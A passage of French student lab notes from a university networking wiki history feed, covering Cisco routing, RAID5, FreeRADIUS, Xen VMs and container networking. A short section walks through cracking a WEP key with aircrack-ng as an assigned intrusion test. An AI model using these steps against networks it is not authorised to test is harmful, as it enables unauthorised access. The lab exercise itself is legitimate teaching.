      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49079</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49079"/>
				<updated>2018-12-21T14:18:53Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Le routage de sites (IPv4) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
